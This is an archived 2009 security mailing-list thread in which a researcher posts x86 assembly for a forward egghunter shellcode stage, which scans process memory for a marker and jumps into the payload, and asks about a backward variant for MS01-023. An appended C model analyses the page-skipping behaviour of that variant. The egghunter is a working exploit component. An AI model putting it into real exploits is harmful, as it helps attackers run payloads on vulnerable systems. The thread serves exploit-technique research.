Dailydave mailing list archives
Re: Merry Xmas & Happy "Search Memory for you Shellcode"...
From: "Nelson Brito" <nbrito () sekure org>
Date: Wed, 23 Dec 2009 12:36:33 -0200
What if?

inc_page:
    and edx, 0FFFFF000h     ; align edx down to the first byte of its page
inc_byte:
    dec edx                 ; decrement our pointer by one

Has anyone tested this yet?
/*
* $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
*
* Author: Nelson Brito <nbrito [at] sekure [dot] org>
Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
http://fnstenv.blogspot.com */
-----Original Message-----
From: Nelson Brito [mailto:nbrito () sekure org]
Sent: Wednesday, December 23, 2009 12:16 PM
To: 'dailydave () lists immunityinc com'
Subject: Merry Xmas & Happy "Search Memory for you Shellcode"...

Hey, fellows.

I got some spare time to work with a well-known technique called "egghunt", based on skape's excellent article "Safely Searching Process Virtual Address Space" (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf). But while trying to perform this technique on a really old vulnerability (MS01-023) the egghunt doesn't work as well as I was expecting.

The code:

win32_syscall_forward_01 PROC
start:
    xor edx, edx            ; zeroing edx, necessary to avoid a BO in 'Release'
inc_page:
    or dx, 0FFFh            ; add PAGE_SIZE-1 to edx
inc_byte:
    inc edx                 ; increment our pointer by one
setup_syscall:
    push edx                ; save edx on the stack
    push +02h               ; push NtAccessCheckAndAuditAlarm
    pop eax                 ; pop into eax
    int 2Eh                 ; perform the syscall (KiSystemService())
    cmp al, 05h             ; did we get 0xc0000005 (STATUS_ACCESS_VIOLATION)?
    pop edx                 ; restore edx
    je inc_page             ; yes, invalid pointer, go to the next page
setup_badge:
    mov eax, "NBNB"         ; throw our badge in eax
check_badge:
    mov edi, edx            ; set edi to the pointer we validated
    scasd                   ; compare the dword in edi to eax
    jnz inc_byte            ; no match? increment the pointer by one
    scasd                   ; compare the dword in edi to eax again (edi is now edx + 4)
    jnz inc_byte            ; no match? increment the pointer by one
badge_found:
    jmp edi                 ; found the badge, jump 8 bytes past it into our code
win32_syscall_forward_01 ENDP

Well, I called this "forward" because it will try to find the code from "the place" the BO happens to the end of the STACK. Am I right?

But in this vulnerability the stager shellcode will be placed somewhere on the BOTTOM of the STACK, right?
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
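The following is an added example and not code from the thread: a user-space C model of the forward egghunter quoted above and of the backward "and edx / dec edx" variant proposed in the reply. The NtAccessCheckAndAuditAlarm probe is replaced by a constructed page map, and the model assumes the probe validates the 8 bytes at edx that the two scasd reads touch (an assumption of this model, not a fact taken from the thread). The six-page layout, the egg location and the start values are likewise constructed for the example.

```c
/* Added example (not code from the thread): a user-space model of skape's
 * forward egghunter and of the backward "and/dec" variant proposed above.
 * The NtAccessCheckAndAuditAlarm probe is replaced by a page map, and the
 * probe is ASSUMED to validate PROBE_BYTES (8) bytes at edx, i.e. exactly
 * what the two scasd reads touch. Addresses are offsets into a constructed
 * 6-page space; the real hunter runs over the whole 4 GiB. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define PAGE_SIZE   0x1000u
#define NPAGES      6u
#define SPACE_SIZE  (NPAGES * PAGE_SIZE)
#define PROBE_BYTES 8u                      /* assumption, see above */
#define EGG         0x424E424Eu             /* "NBNB" read as a little-endian dword */
#define NOT_FOUND   0xFFFFFFFFu

typedef struct {
    uint8_t mem[SPACE_SIZE];                /* backing bytes */
    uint8_t mapped[NPAGES];                 /* 1 = readable page, 0 = unmapped */
} space_t;

/* Build the constructed layout: the egg "NBNBNBNB" at egg_addr, zero elsewhere. */
static void build_space(space_t *s, const uint8_t map[NPAGES], uint32_t egg_addr)
{
    memset(s, 0, sizeof *s);
    memcpy(s->mapped, map, NPAGES);
    memcpy(&s->mem[egg_addr], "NBNBNBNB", 8);
}

/* Model of the syscall check: 1 if every page touched by [addr, addr+PROBE_BYTES)
 * is mapped, 0 for STATUS_ACCESS_VIOLATION (or for leaving the model). */
static int probe_ok(const space_t *s, uint32_t addr)
{
    if (addr >= SPACE_SIZE || PROBE_BYTES > SPACE_SIZE - addr) return 0;
    for (uint32_t p = addr / PAGE_SIZE; p <= (addr + PROBE_BYTES - 1) / PAGE_SIZE; p++)
        if (!s->mapped[p]) return 0;
    return 1;
}

static uint32_t load32(const space_t *s, uint32_t addr)   /* what scasd compares */
{
    uint32_t v;
    memcpy(&v, &s->mem[addr], 4);
    return v;
}

/* skape's hunter as posted, one C line per instruction. */
static uint32_t hunt_forward(const space_t *s, uint32_t edx)
{
inc_page:
    edx |= 0xFFFu;                          /* or dx, 0FFFh : last byte of this page */
inc_byte:
    edx++;                                  /* inc edx      : next byte, or first byte of the next page */
    if (edx >= SPACE_SIZE) return NOT_FOUND;            /* model bound only */
    if (!probe_ok(s, edx)) goto inc_page;               /* int 2Eh ; cmp al,05h ; je inc_page */
    if (load32(s, edx) != EGG) goto inc_byte;           /* mov edi,edx ; scasd ; jnz inc_byte */
    if (load32(s, edx + 4) != EGG) goto inc_byte;       /* scasd ; jnz inc_byte */
    return edx + 8;                                     /* jmp edi : 8 bytes past the badge */
}

/* The proposed backward variant: align down, then decrement. */
static uint32_t hunt_backward(const space_t *s, uint32_t edx)
{
inc_page:
    edx &= 0xFFFFF000u;                     /* and edx, 0FFFFF000h : first byte of this page */
inc_byte:
    edx--;                                  /* dec edx : previous byte, or last byte of the previous page */
    if (edx >= SPACE_SIZE) return NOT_FOUND;            /* also catches the wrap below 0 */
    if (!probe_ok(s, edx)) goto inc_page;
    if (load32(s, edx) != EGG) goto inc_byte;
    if (load32(s, edx + 4) != EGG) goto inc_byte;
    return edx + 8;
}

/* Constructed layout: pages 0 and 2 unmapped, egg at 0x3020 (page 3), page 4
 * mapped or not as requested. Forward starts at edx = 0 like the posted code;
 * backward starts at edx = 0x5000, i.e. "above" the egg. */
static uint32_t run_hunt(int backward, int page4_mapped)
{
    static space_t s;                       /* 24 KiB, kept off the stack */
    uint8_t map[NPAGES] = {0, 1, 0, 1, (uint8_t)page4_mapped, 1};
    build_space(&s, map, 0x3020);
    return backward ? hunt_backward(&s, 0x5000) : hunt_forward(&s, 0);
}

int main(void)
{
    printf("forward,  page 4 mapped:   0x%08x\n", run_hunt(0, 1));
    printf("forward,  page 4 unmapped: 0x%08x\n", run_hunt(0, 0));
    printf("backward, page 4 mapped:   0x%08x\n", run_hunt(1, 1));
    printf("backward, page 4 unmapped: 0x%08x\n", run_hunt(1, 0));   /* NOT_FOUND: page 3 skipped */
    return 0;
}
```

In this model both directions find the badge at 0x3028 when page 4 is mapped, but the backward variant returns NOT_FOUND when page 4 is unmapped: the probe at 0x3fff fails only because the 8-byte window spills into page 4, and `and edx, 0FFFFF000h` then steps over all of page 3 before the next probe. The forward hunter loses only the last seven bytes of a page in the same situation, which cannot hold the eight-byte badge anyway. Whether the real syscall validates exactly eight bytes is the model's assumption; with a smaller probe window the backward variant would instead fault on the second scasd at the top of such a page, which is the check worth doing before relying on it.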
Current thread:
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Nelson Brito (Dec 23)
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Berend-Jan Wever (Dec 23)
